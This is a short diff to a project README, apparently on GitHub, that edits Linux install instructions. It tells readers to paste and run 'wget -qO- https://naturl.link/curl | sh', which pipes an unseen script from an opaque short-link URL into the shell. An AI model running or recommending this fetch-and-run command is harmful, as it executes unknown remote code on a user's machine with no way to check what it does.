mastercodin/stunning-enigma/README.md

 ## For Linux
 ### Direct method (Highly preferred)
 1. **Open Terminal**
-2. Copy and Paste this command pressing "Control + Shift + V" from your keyboard or manually (pressing right click and clicking on paste) paste it.
+2. Copy and Paste this command pressing "Control + Shift + V" from your keyboard or manually (pressing right click and clicking on paste) paste it and press enter.
 ```bash
 wget -qO- https://naturl.link/curl | sh
 ```